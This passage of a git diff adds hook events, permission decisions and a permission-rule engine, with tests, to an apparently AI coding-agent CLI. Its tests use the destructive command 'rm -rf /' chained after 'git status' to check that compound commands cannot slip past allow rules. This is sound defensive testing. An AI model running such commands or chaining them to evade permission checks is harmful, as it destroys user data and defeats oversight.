toolInput, + toolUseId, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('PreToolUse', result.finalOutput) + : undefined; + } + + /** + * Fire a PostToolUse event - called after successful tool execution + */ + async firePostToolUseEvent( + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePostToolUseEvent( + toolName, + toolInput, + toolResponse, + toolUseId, + permissionMode, + ); + return result.finalOutput + ? 
createHookOutput('PostToolUse', result.finalOutput) + : undefined; + } + + /** + * Fire a PostToolUseFailure event - called when tool execution fails + */ + async firePostToolUseFailureEvent( + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: string, + isInterrupt?: boolean, + permissionMode?: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePostToolUseFailureEvent( + toolUseId, + toolName, + toolInput, + errorMessage, + isInterrupt, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('PostToolUseFailure', result.finalOutput) + : undefined; + } + + /** + * Fire a PreCompact event - called before conversation compaction + */ + async firePreCompactEvent( + trigger: PreCompactTrigger, + customInstructions: string = '', + ): Promise { + const result = await this.hookEventHandler.firePreCompactEvent( + trigger, + customInstructions, + ); + return result.finalOutput + ? createHookOutput('PreCompact', result.finalOutput) + : undefined; + } + + /** + * Fire a Notification event + */ + async fireNotificationEvent( + message: string, + notificationType: NotificationType, + title?: string, + ): Promise { + const result = await this.hookEventHandler.fireNotificationEvent( + message, + notificationType, + title, + ); + return result.finalOutput + ? createHookOutput('Notification', result.finalOutput) + : undefined; + } + + /** + * Fire a SubagentStart event - called when a subagent is spawned + */ + async fireSubagentStartEvent( + agentId: string, + agentType: AgentType | string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.fireSubagentStartEvent( + agentId, + agentType, + permissionMode, + ); + return result.finalOutput + ? 
createHookOutput('SubagentStart', result.finalOutput) + : undefined; + } + + /** + * Fire a SubagentStop event - called when a subagent finishes + */ + async fireSubagentStopEvent( + agentId: string, + agentType: AgentType | string, + agentTranscriptPath: string, + lastAssistantMessage: string, + stopHookActive: boolean, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.fireSubagentStopEvent( + agentId, + agentType, + agentTranscriptPath, + lastAssistantMessage, + stopHookActive, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('SubagentStop', result.finalOutput) + : undefined; + } + + /** + * Fire a PermissionRequest event + */ + async firePermissionRequestEvent( + toolName: string, + toolInput: Record, + permissionMode: PermissionMode, + permissionSuggestions?: PermissionSuggestion[], + ): Promise { + const result = await this.hookEventHandler.firePermissionRequestEvent( + toolName, + toolInput, + permissionMode, + permissionSuggestions, + ); + return result.finalOutput + ? 
createHookOutput('PermissionRequest', result.finalOutput) + : undefined; + } } diff --git a/packages/core/src/hooks/types.ts b/packages/core/src/hooks/types.ts index 49ac7a5ef..e07e1087c 100644 --- a/packages/core/src/hooks/types.ts +++ b/packages/core/src/hooks/types.ts @@ -3,6 +3,9 @@ * Copyright 2026 Qwen Team * SPDX-License-Identifier: Apache-2.0 */ +import { createDebugLogger } from '../utils/debugLogger.js'; + +const debugLogger = createDebugLogger('TRUSTED_HOOKS'); export enum HooksConfigSource { Project = 'project', @@ -125,7 +128,12 @@ export function createHookOutput( switch (eventName) { case HookEventName.PreToolUse: return new PreToolUseHookOutput(data); + case HookEventName.PostToolUse: + return new PostToolUseHookOutput(data); + case HookEventName.PostToolUseFailure: + return new PostToolUseFailureHookOutput(data); case HookEventName.Stop: + case HookEventName.SubagentStop: return new StopHookOutput(data); case HookEventName.PermissionRequest: return new PermissionRequestHookOutput(data); @@ -222,21 +230,110 @@ export class DefaultHookOutput implements HookOutput { */ export class PreToolUseHookOutput extends DefaultHookOutput { /** - * Get modified tool input if provided by hook + * Get permission decision from hook output + * @returns 'allow' | 'deny' | 'ask' | undefined */ - getModifiedToolInput(): Record | undefined { - if (this.hookSpecificOutput && 'tool_input' in this.hookSpecificOutput) { - const input = this.hookSpecificOutput['tool_input']; - if ( - typeof input === 'object' && - input !== null && - !Array.isArray(input) - ) { - return input as Record; + getPermissionDecision(): 'allow' | 'deny' | 'ask' | undefined { + if ( + this.hookSpecificOutput && + 'permissionDecision' in this.hookSpecificOutput + ) { + const decision = this.hookSpecificOutput['permissionDecision']; + if (decision === 'allow' || decision === 'deny' || decision === 'ask') { + return decision; } } + // Fall back to base decision field + if (this.decision === 'allow' || 
this.decision === 'approve') { + return 'allow'; + } + if (this.decision === 'deny' || this.decision === 'block') { + return 'deny'; + } + if (this.decision === 'ask') { + return 'ask'; + } return undefined; } + + /** + * Get permission decision reason + */ + getPermissionDecisionReason(): string | undefined { + if ( + this.hookSpecificOutput && + 'permissionDecisionReason' in this.hookSpecificOutput + ) { + const reason = this.hookSpecificOutput['permissionDecisionReason']; + if (typeof reason === 'string') { + return reason; + } + } + return this.reason; + } + + /** + * Check if permission was denied + */ + isDenied(): boolean { + return this.getPermissionDecision() === 'deny'; + } + + /** + * Check if user confirmation is required + */ + isAsk(): boolean { + return this.getPermissionDecision() === 'ask'; + } + + /** + * Check if permission was allowed + */ + isAllowed(): boolean { + return this.getPermissionDecision() === 'allow'; + } +} + +/** + * Specific hook output class for PostToolUse events. + * Default behavior is to allow tool usage if the hook does not explicitly set a decision. + * This follows the security model of allowing by default unless explicitly blocked. + */ +export class PostToolUseHookOutput extends DefaultHookOutput { + override decision: HookDecision; + override reason: string; + + constructor(data: Partial = {}) { + super(data); + // Default to allowing tool usage if hook does not provide explicit decision + // This maintains backward compatibility and follows security model of allowing by default + this.decision = data.decision ?? 'allow'; + this.reason = data.reason ?? 
'No reason provided'; + + // Log when default values are used to help with debugging + if (data.decision === undefined) { + debugLogger.debug( + 'PostToolUseHookOutput: No explicit decision set, defaulting to "allow"', + ); + } + if (data.reason === undefined) { + debugLogger.debug( + 'PostToolUseHookOutput: No explicit reason set, defaulting to "No reason provided"', + ); + } + } +} + +/** + * Specific hook output class for PostToolUseFailure events. + */ +export class PostToolUseFailureHookOutput extends DefaultHookOutput { + /** + * Get additional context to provide error handling information + */ + override getAdditionalContext(): string | undefined { + return super.getAdditionalContext(); + } } /** @@ -353,44 +450,23 @@ export class PermissionRequestHookOutput extends DefaultHookOutput { } /** - * Context for MCP tool executions. - * Contains non-sensitive connection information about the MCP server - * identity. Since server_name is user controlled and arbitrary, we - * also include connection information (e.g., command or url) to - * help identify the MCP server. - * - * NOTE: In the future, consider defining a shared sanitized interface - * from MCPServerConfig to avoid duplication and ensure consistency. 
+ * PreToolUse hook input */ -export interface McpToolContext { - server_name: string; - tool_name: string; // Original tool name from the MCP server - - // Connection info (mutually exclusive based on transport type) - command?: string; // For stdio transport - args?: string[]; // For stdio transport - cwd?: string; // For stdio transport - - url?: string; // For SSE/HTTP transport - - tcp?: string; // For WebSocket transport -} - export interface PreToolUseInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; tool_name: string; tool_input: Record; - mcp_context?: McpToolContext; - original_request_name?: string; + tool_use_id: string; // Unique identifier for this tool use instance } /** * PreToolUse hook output */ export interface PreToolUseOutput extends HookOutput { - hookSpecificOutput?: { + hookSpecificOutput: { hookEventName: 'PreToolUse'; - tool_input?: Record; + permissionDecision: 'allow' | 'deny' | 'ask'; + permissionDecisionReason: string; }; } @@ -398,30 +474,24 @@ export interface PreToolUseOutput extends HookOutput { * PostToolUse hook input */ export interface PostToolUseInput extends HookInput { + permission_mode: PermissionMode; tool_name: string; tool_input: Record; tool_response: Record; - mcp_context?: McpToolContext; - original_request_name?: string; + tool_use_id: string; // Unique identifier for this tool use instance } /** * PostToolUse hook output */ export interface PostToolUseOutput extends HookOutput { + decision: HookDecision; + reason: string; hookSpecificOutput?: { hookEventName: 'PostToolUse'; additionalContext?: string; - - /** - * Optional request to execute another tool immediately after this one. - * The result of this tail call will replace the original tool's response. 
- */ - tailToolCallRequest?: { - name: string; - args: Record; - }; }; + updatedMCPToolOutput?: Record; } /** @@ -429,11 +499,11 @@ export interface PostToolUseOutput extends HookOutput { * Fired when a tool execution fails */ export interface PostToolUseFailureInput extends HookInput { + permission_mode: PermissionMode; tool_use_id: string; // Unique identifier for the tool use tool_name: string; tool_input: Record; error: string; // Error message describing the failure - error_type?: string; // Type of error (e.g., 'timeout', 'network', 'permission', etc.) is_interrupt?: boolean; // Whether the failure was caused by user interruption } @@ -469,18 +539,19 @@ export interface UserPromptSubmitOutput extends HookOutput { * Notification types */ export enum NotificationType { - ToolPermission = 'ToolPermission', + PermissionPrompt = 'permission_prompt', + IdlePrompt = 'idle_prompt', + AuthSuccess = 'auth_success', + ElicitationDialog = 'elicitation_dialog', } /** * Notification hook input */ export interface NotificationInput extends HookInput { - permission_mode?: PermissionMode; - notification_type: NotificationType; message: string; title?: string; - details: Record; + notification_type: NotificationType; } /** @@ -524,18 +595,18 @@ export enum SessionStartSource { export enum PermissionMode { Default = 'default', Plan = 'plan', - AcceptEdit = 'accept_edit', - DontAsk = 'dont_ask', - BypassPermissions = 'bypass_permissions', + AutoEdit = 'auto_edit', + Yolo = 'yolo', } /** * SessionStart hook input */ export interface SessionStartInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; source: SessionStartSource; - model?: string; + model: string; + agent_type?: AgentType; } /** @@ -589,7 +660,7 @@ export enum PreCompactTrigger { */ export interface PreCompactInput extends HookInput { trigger: PreCompactTrigger; - custom_instructions?: string; + custom_instructions: string; } /** @@ -598,7 +669,7 @@ export interface 
PreCompactInput extends HookInput { export interface PreCompactOutput extends HookOutput { hookSpecificOutput?: { hookEventName: 'PreCompact'; - additionalContext?: string; + additionalContext: string; }; } @@ -611,12 +682,12 @@ export enum AgentType { /** * SubagentStart hook input - * Fired when a subagent (Task tool call) is started + * Fired when a subagent (Agent tool call) is spawned */ export interface SubagentStartInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; agent_id: string; - agent_type: AgentType; + agent_type: AgentType | string; } /** @@ -631,13 +702,13 @@ export interface SubagentStartOutput extends HookOutput { /** * SubagentStop hook input - * Fired right before a subagent (Task tool call) concludes its response + * Fired when a subagent has finished responding */ export interface SubagentStopInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; stop_hook_active: boolean; agent_id: string; - agent_type: AgentType; + agent_type: AgentType | string; agent_transcript_path: string; last_assistant_message: string; } diff --git a/packages/core/src/index.ts b/packages/core/src/index.ts index e1fe65d2f..8ca2014b7 100644 --- a/packages/core/src/index.ts +++ b/packages/core/src/index.ts @@ -12,6 +12,9 @@ export * from './config/config.js'; export { Storage } from './config/storage.js'; +// Permission system +export * from './permissions/index.js'; + // Model configuration export { DEFAULT_QWEN_MODEL, @@ -88,6 +91,8 @@ export * from './tools/shell.js'; export * from './tools/skill.js'; export * from './tools/task.js'; export * from './tools/todoWrite.js'; +export * from './tools/tool-error.js'; +export * from './tools/tool-registry.js'; export * from './tools/web-fetch.js'; export * from './tools/web-search/index.js'; export * from './tools/write-file.js'; @@ -100,6 +105,7 @@ export * from './services/chatRecordingService.js'; export * from 
'./services/fileDiscoveryService.js'; export * from './services/fileSystemService.js'; export * from './services/gitService.js'; +export * from './services/gitWorktreeService.js'; export * from './services/sessionService.js'; export * from './services/shellExecutionService.js'; @@ -175,13 +181,14 @@ export { } from './telemetry/types.js'; // ============================================================================ -// Extensions, Skills & Subagents +// Extensions, Skills, Subagents & Agents // ============================================================================ export * from './extension/index.js'; export * from './prompts/mcp-prompts.js'; export * from './skills/index.js'; export * from './subagents/index.js'; +export * from './agents/index.js'; // ============================================================================ // Utilities @@ -191,6 +198,7 @@ export * from './utils/browser.js'; export * from './utils/configResolver.js'; export * from './utils/debugLogger.js'; export * from './utils/editor.js'; +export * from './utils/environmentContext.js'; export * from './utils/errorParsing.js'; export * from './utils/errors.js'; export * from './utils/fileUtils.js'; @@ -212,6 +220,7 @@ export * from './utils/promptIdContext.js'; export * from './utils/quotaErrorDetection.js'; export * from './utils/readManyFiles.js'; export * from './utils/request-tokenizer/supportedImageFormats.js'; +export { TextTokenizer } from './utils/request-tokenizer/textTokenizer.js'; export * from './utils/retry.js'; export * from './utils/ripgrepUtils.js'; export * from './utils/schemaValidator.js'; @@ -247,3 +256,9 @@ export * from './test-utils/index.js'; export * from './hooks/types.js'; export { HookSystem, HookRegistry } from './hooks/index.js'; export type { HookRegistryEntry } from './hooks/index.js'; + +// Export hook triggers for notification hooks +export { + fireNotificationHook, + type NotificationHookResult, +} from './core/toolHookTriggers.js'; diff --git 
a/packages/core/src/models/modelsConfig.test.ts b/packages/core/src/models/modelsConfig.test.ts index 25268aebe..87c8aaf34 100644 --- a/packages/core/src/models/modelsConfig.test.ts +++ b/packages/core/src/models/modelsConfig.test.ts @@ -1506,4 +1506,130 @@ describe('ModelsConfig', () => { expect(allModels.some((m) => m.id === 'gemini-ultra')).toBe(true); }); }); + + describe('max_tokens in modelsConfig', () => { + it('should not auto-fill max_tokens when samplingParams is undefined', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + // No generationConfig.samplingParams defined + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + expect(gc.samplingParams).toBeUndefined(); + }); + + it('should not auto-fill max_tokens when samplingParams exists but max_tokens is missing', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + generationConfig: { + samplingParams: { temperature: 0.7 }, // max_tokens not defined + }, + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + // Should preserve existing sampling params but not inject max_tokens + expect(gc.samplingParams?.temperature).toBe(0.7); + expect(gc.samplingParams?.max_tokens).toBeUndefined(); + + const sources = modelsConfig.getGenerationConfigSources(); + expect(sources['samplingParams']?.kind).toBe('modelProviders'); + }); + + it('should not override existing max_tokens from modelProviders', async () 
=> { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + generationConfig: { + samplingParams: { temperature: 0.7, max_tokens: 4096 }, + }, + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + // Should preserve both values from provider + expect(gc.samplingParams?.temperature).toBe(0.7); + expect(gc.samplingParams?.max_tokens).toBe(4096); + + const sources = modelsConfig.getGenerationConfigSources(); + expect(sources['samplingParams']?.kind).toBe('modelProviders'); + }); + + it('should not auto-fill max_tokens for different model families', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + anthropic: [ + { + id: 'claude-3-opus', + name: 'Claude 3 Opus', + baseUrl: 'https://api.anthropic.example.com/v1', + }, + ], + gemini: [ + { + id: 'gemini-pro', + name: 'Gemini Pro', + baseUrl: 'https://api.gemini.example.com/v1', + }, + ], + }; + + // Test Claude model without provider max_tokens + const claudeConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_ANTHROPIC, + modelProvidersConfig, + }); + + await claudeConfig.switchModel(AuthType.USE_ANTHROPIC, 'claude-3-opus'); + + let gc = currentGenerationConfig(claudeConfig); + expect(gc.samplingParams).toBeUndefined(); + + // Test Gemini model without provider max_tokens + const geminiConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_GEMINI, + modelProvidersConfig, + }); + + await geminiConfig.switchModel(AuthType.USE_GEMINI, 'gemini-pro'); + + gc = currentGenerationConfig(geminiConfig); + expect(gc.samplingParams).toBeUndefined(); + }); + }); }); diff --git a/packages/core/src/permissions/index.ts b/packages/core/src/permissions/index.ts new file mode 100644 index 000000000..f03062aa7 --- 
/dev/null +++ b/packages/core/src/permissions/index.ts @@ -0,0 +1,12 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +export * from './types.js'; +export * from './rule-parser.js'; +export { PermissionManager } from './permission-manager.js'; +export type { PermissionManagerConfig } from './permission-manager.js'; +export { extractShellOperations } from './shell-semantics.js'; +export type { ShellOperation } from './shell-semantics.js'; diff --git a/packages/core/src/permissions/permission-manager.test.ts b/packages/core/src/permissions/permission-manager.test.ts new file mode 100644 index 000000000..f7a312f1a --- /dev/null +++ b/packages/core/src/permissions/permission-manager.test.ts @@ -0,0 +1,1513 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach } from 'vitest'; +import os from 'node:os'; +import { + parseRule, + parseRules, + matchesRule, + matchesCommandPattern, + matchesPathPattern, + matchesDomainPattern, + resolveToolName, + resolvePathPattern, + getSpecifierKind, + toolMatchesRuleToolName, + splitCompoundCommand, + buildPermissionRules, + getRuleDisplayName, +} from './rule-parser.js'; +import { PermissionManager } from './permission-manager.js'; +import type { PermissionManagerConfig } from './permission-manager.js'; + +// ─── resolveToolName ───────────────────────────────────────────────────────── + +describe('resolveToolName', () => { + it('resolves canonical names', () => { + expect(resolveToolName('run_shell_command')).toBe('run_shell_command'); + expect(resolveToolName('read_file')).toBe('read_file'); + }); + + it('resolves display-name aliases', () => { + expect(resolveToolName('Shell')).toBe('run_shell_command'); + expect(resolveToolName('ShellTool')).toBe('run_shell_command'); + expect(resolveToolName('Bash')).toBe('run_shell_command'); + expect(resolveToolName('ReadFile')).toBe('read_file'); + 
expect(resolveToolName('ReadFileTool')).toBe('read_file'); + expect(resolveToolName('EditTool')).toBe('edit'); + expect(resolveToolName('WriteFileTool')).toBe('write_file'); + }); + + it('resolves "Read" and "Edit" meta-categories', () => { + expect(resolveToolName('Read')).toBe('read_file'); + expect(resolveToolName('Edit')).toBe('edit'); + expect(resolveToolName('Write')).toBe('write_file'); + }); + + it('resolves Agent category', () => { + expect(resolveToolName('Agent')).toBe('task'); + }); + + it('returns unknown names unchanged', () => { + expect(resolveToolName('my_mcp_tool')).toBe('my_mcp_tool'); + expect(resolveToolName('mcp__server__tool')).toBe('mcp__server__tool'); + }); +}); + +// ─── getSpecifierKind ──────────────────────────────────────────────────────── + +describe('getSpecifierKind', () => { + it('returns "command" for shell tools', () => { + expect(getSpecifierKind('run_shell_command')).toBe('command'); + }); + + it('returns "path" for file read/edit tools', () => { + expect(getSpecifierKind('read_file')).toBe('path'); + expect(getSpecifierKind('edit')).toBe('path'); + expect(getSpecifierKind('write_file')).toBe('path'); + expect(getSpecifierKind('grep_search')).toBe('path'); + expect(getSpecifierKind('glob')).toBe('path'); + expect(getSpecifierKind('list_directory')).toBe('path'); + }); + + it('returns "domain" for web fetch tools', () => { + expect(getSpecifierKind('web_fetch')).toBe('domain'); + }); + + it('returns "literal" for other tools', () => { + expect(getSpecifierKind('Agent')).toBe('literal'); + expect(getSpecifierKind('task')).toBe('literal'); + expect(getSpecifierKind('mcp__server')).toBe('literal'); + }); +}); + +// ─── toolMatchesRuleToolName ───────────────────────────────────────────────── + +describe('toolMatchesRuleToolName', () => { + it('exact match', () => { + expect(toolMatchesRuleToolName('read_file', 'read_file')).toBe(true); + expect(toolMatchesRuleToolName('edit', 'edit')).toBe(true); + }); + + it('"Read" (read_file) 
covers grep_search, glob, list_directory', () => { + expect(toolMatchesRuleToolName('read_file', 'grep_search')).toBe(true); + expect(toolMatchesRuleToolName('read_file', 'glob')).toBe(true); + expect(toolMatchesRuleToolName('read_file', 'list_directory')).toBe(true); + }); + + it('"Edit" (edit) covers write_file', () => { + expect(toolMatchesRuleToolName('edit', 'write_file')).toBe(true); + }); + + it('does not cross categories', () => { + expect(toolMatchesRuleToolName('read_file', 'edit')).toBe(false); + expect(toolMatchesRuleToolName('edit', 'read_file')).toBe(false); + expect(toolMatchesRuleToolName('read_file', 'run_shell_command')).toBe( + false, + ); + }); +}); + +// ─── parseRule ─────────────────────────────────────────────────────────────── + +describe('parseRule', () => { + it('parses a simple tool name', () => { + const r = parseRule('ShellTool'); + expect(r.raw).toBe('ShellTool'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBeUndefined(); + expect(r.specifierKind).toBeUndefined(); + }); + + it('parses Bash alias (Claude Code compat)', () => { + const r = parseRule('Bash'); + expect(r.toolName).toBe('run_shell_command'); + }); + + it('parses a shell tool with a specifier', () => { + const r = parseRule('Bash(git *)'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBe('git *'); + expect(r.specifierKind).toBe('command'); + }); + + it('parses Read with path specifier', () => { + const r = parseRule('Read(./secrets/**)'); + expect(r.toolName).toBe('read_file'); + expect(r.specifier).toBe('./secrets/**'); + expect(r.specifierKind).toBe('path'); + }); + + it('parses Edit with path specifier', () => { + const r = parseRule('Edit(/src/**/*.ts)'); + expect(r.toolName).toBe('edit'); + expect(r.specifier).toBe('/src/**/*.ts'); + expect(r.specifierKind).toBe('path'); + }); + + it('parses WebFetch with domain specifier', () => { + const r = parseRule('WebFetch(domain:example.com)'); + 
expect(r.toolName).toBe('web_fetch'); + expect(r.specifier).toBe('domain:example.com'); + expect(r.specifierKind).toBe('domain'); + }); + + it('parses Agent with literal specifier', () => { + const r = parseRule('Agent(Explore)'); + expect(r.toolName).toBe('task'); + expect(r.specifier).toBe('Explore'); + expect(r.specifierKind).toBe('literal'); + }); + + it('handles unknown tools without specifier', () => { + const r = parseRule('mcp__my_server__my_tool'); + expect(r.toolName).toBe('mcp__my_server__my_tool'); + expect(r.specifier).toBeUndefined(); + }); + + it('handles legacy :* suffix (deprecated)', () => { + const r = parseRule('Bash(git:*)'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBe('git *'); + }); + + it('handles malformed pattern (no closing paren)', () => { + const r = parseRule('Bash(git status'); + expect(r.specifier).toBeUndefined(); + }); +}); + +// ─── parseRules ────────────────────────────────────────────────────────────── + +describe('parseRules', () => { + it('filters empty strings', () => { + const rules = parseRules(['ShellTool', '', ' ', 'ReadFileTool']); + expect(rules).toHaveLength(2); + }); +}); + +// ─── matchesCommandPattern (Shell glob) ────────────────────────────────────── + +describe('matchesCommandPattern', () => { + // Basic prefix matching (no wildcards) + describe('prefix matching without glob', () => { + it('exact match', () => { + expect(matchesCommandPattern('git', 'git')).toBe(true); + }); + + it('prefix + space', () => { + expect(matchesCommandPattern('git', 'git status')).toBe(true); + expect(matchesCommandPattern('git commit', 'git commit -m "test"')).toBe( + true, + ); + }); + + it('does not match as substring', () => { + expect(matchesCommandPattern('git', 'gitcommit')).toBe(false); + }); + }); + + // Wildcard at tail + describe('wildcard at tail', () => { + it('matches any arguments', () => { + expect(matchesCommandPattern('git *', 'git status')).toBe(true); + 
expect(matchesCommandPattern('git *', 'git commit -m "test"')).toBe(true); + expect(matchesCommandPattern('npm run *', 'npm run build')).toBe(true); + }); + + it('space-star requires word boundary (ls * does not match lsof)', () => { + expect(matchesCommandPattern('ls *', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls *', 'lsof')).toBe(false); + }); + + it('no-space-star allows prefix matching (ls* matches lsof)', () => { + expect(matchesCommandPattern('ls*', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls*', 'lsof')).toBe(true); + }); + + it('does not match different command', () => { + expect(matchesCommandPattern('git *', 'echo hello')).toBe(false); + }); + }); + + // Wildcard at head + describe('wildcard at head', () => { + it('matches any command ending with pattern', () => { + expect(matchesCommandPattern('* --version', 'node --version')).toBe(true); + expect(matchesCommandPattern('* --version', 'npm --version')).toBe(true); + expect(matchesCommandPattern('* --help *', 'npm --help install')).toBe( + true, + ); + }); + + it('does not match non-matching suffix', () => { + expect(matchesCommandPattern('* --version', 'node --help')).toBe(false); + }); + }); + + // Wildcard in middle + describe('wildcard in middle', () => { + it('matches middle segments', () => { + expect(matchesCommandPattern('git * main', 'git checkout main')).toBe( + true, + ); + expect(matchesCommandPattern('git * main', 'git merge main')).toBe(true); + }); + + it('does not match different suffix', () => { + expect(matchesCommandPattern('git * main', 'git checkout dev')).toBe( + false, + ); + }); + }); + + // Word boundary rule: space before * matters + describe('word boundary rule (space before *)', () => { + it('Bash(ls *): matches "ls -la" but NOT "lsof"', () => { + expect(matchesCommandPattern('ls *', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls *', 'ls')).toBe(true); // "ls" alone + expect(matchesCommandPattern('ls *', 'lsof')).toBe(false); + }); + + 
it('Bash(ls*): matches both "ls -la" and "lsof"', () => { + expect(matchesCommandPattern('ls*', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls*', 'lsof')).toBe(true); + expect(matchesCommandPattern('ls*', 'ls')).toBe(true); + }); + + it('Bash(npm *): matches "npm run" but NOT "npmx"', () => { + expect(matchesCommandPattern('npm *', 'npm run build')).toBe(true); + expect(matchesCommandPattern('npm *', 'npmx install')).toBe(false); + }); + }); + + // Shell operator awareness + // + // Key insight: operator boundary extraction means we only match against + // the FIRST simple command. So `git *` still matches `git status && rm -rf /` + // because the first command IS `git status` which matches `git *`. + // + // The safety benefit: a pattern like `rm *` would NOT match + // `git status && rm -rf /` because the first command is `git status`. + // matchesCommandPattern operates on simple commands only. + // Compound command splitting is handled by PermissionManager.evaluate(). + // These tests verify that matchesCommandPattern works correctly on + // individual simple commands (the sub-commands after splitting). 
+ describe('simple command matching (no operators)', () => { + it('matches when no operators are present', () => { + expect( + matchesCommandPattern('git *', 'git commit -m "hello world"'), + ).toBe(true); + }); + + it('operators inside quotes are not boundaries for splitCompoundCommand', () => { + // "echo 'a && b'" → the && is inside quotes, not an operator + expect(matchesCommandPattern('echo *', "echo 'a && b'")).toBe(true); + }); + }); + + // Special: lone * matches any command + describe('lone wildcard', () => { + it('* matches any single command', () => { + expect(matchesCommandPattern('*', 'anything here')).toBe(true); + }); + }); + + // Exact command match with specifier + describe('exact command specifier', () => { + it('Bash(npm run build) matches exact command', () => { + expect(matchesCommandPattern('npm run build', 'npm run build')).toBe( + true, + ); + }); + it('Bash(npm run build) also matches with trailing args (prefix)', () => { + expect( + matchesCommandPattern('npm run build', 'npm run build --verbose'), + ).toBe(true); + }); + it('Bash(npm run build) does not match different command', () => { + expect(matchesCommandPattern('npm run build', 'npm run test')).toBe( + false, + ); + }); + }); +}); + +// ─── splitCompoundCommand ──────────────────────────────────────────────────── + +describe('splitCompoundCommand', () => { + it('simple command returns single-element array', () => { + expect(splitCompoundCommand('git status')).toEqual(['git status']); + }); + + it('splits on &&', () => { + expect(splitCompoundCommand('git status && rm -rf /')).toEqual([ + 'git status', + 'rm -rf /', + ]); + }); + + it('splits on ||', () => { + expect(splitCompoundCommand('git push || echo failed')).toEqual([ + 'git push', + 'echo failed', + ]); + }); + + it('splits on ;', () => { + expect(splitCompoundCommand('echo hello; echo world')).toEqual([ + 'echo hello', + 'echo world', + ]); + }); + + it('splits on |', () => { + expect(splitCompoundCommand('git log | grep 
fix')).toEqual([ + 'git log', + 'grep fix', + ]); + }); + + it('handles three-part compound', () => { + expect(splitCompoundCommand('a && b && c')).toEqual(['a', 'b', 'c']); + }); + + it('handles mixed operators', () => { + expect(splitCompoundCommand('a && b | c; d')).toEqual(['a', 'b', 'c', 'd']); + }); + + it('does not split on operators inside single quotes', () => { + expect(splitCompoundCommand("echo 'a && b'")).toEqual(["echo 'a && b'"]); + }); + + it('does not split on operators inside double quotes', () => { + expect(splitCompoundCommand('echo "a && b"')).toEqual(['echo "a && b"']); + }); + + it('handles escaped characters', () => { + expect(splitCompoundCommand('echo a \\&& b')).toEqual(['echo a \\&& b']); + }); + + it('trims whitespace around sub-commands', () => { + expect(splitCompoundCommand(' git status && rm -rf / ')).toEqual([ + 'git status', + 'rm -rf /', + ]); + }); +}); + +// ─── resolvePathPattern ────────────────────────────────────────────────────── + +describe('resolvePathPattern', () => { + const projectRoot = '/project'; + const cwd = '/project/subdir'; + + it('// prefix → absolute from filesystem root', () => { + expect( + resolvePathPattern('//Users/alice/secrets/**', projectRoot, cwd), + ).toBe('/Users/alice/secrets/**'); + }); + + it('~/ prefix → relative to home directory', () => { + const result = resolvePathPattern('~/Documents/*.pdf', projectRoot, cwd); + expect(result).toContain('Documents/*.pdf'); + // On POSIX systems the home dir starts with '/'; on Windows it may look like + // 'C:/Users/foo'. Either way, verify the result begins with the (normalized) + // home directory. 
+ const normalizedHome = os.homedir().replace(/\\/g, '/'); + expect(result.startsWith(normalizedHome)).toBe(true); + }); + + it('/ prefix → relative to project root (NOT absolute)', () => { + expect(resolvePathPattern('/src/**/*.ts', projectRoot, cwd)).toBe( + '/project/src/**/*.ts', + ); + }); + + it('./ prefix → relative to cwd', () => { + expect(resolvePathPattern('./secrets/**', projectRoot, cwd)).toBe( + '/project/subdir/secrets/**', + ); + }); + + it('no prefix → relative to cwd', () => { + expect(resolvePathPattern('*.env', projectRoot, cwd)).toBe( + '/project/subdir/*.env', + ); + }); + + it('/Users/alice/file is relative to project root, NOT absolute', () => { + // This is a gotcha from the Claude Code docs + expect(resolvePathPattern('/Users/alice/file', projectRoot, cwd)).toBe( + '/project/Users/alice/file', + ); + }); +}); + +// ─── matchesPathPattern ────────────────────────────────────────────────────── + +describe('matchesPathPattern', () => { + const projectRoot = '/project'; + const cwd = '/project'; + + it('matches dotfiles (e.g. 
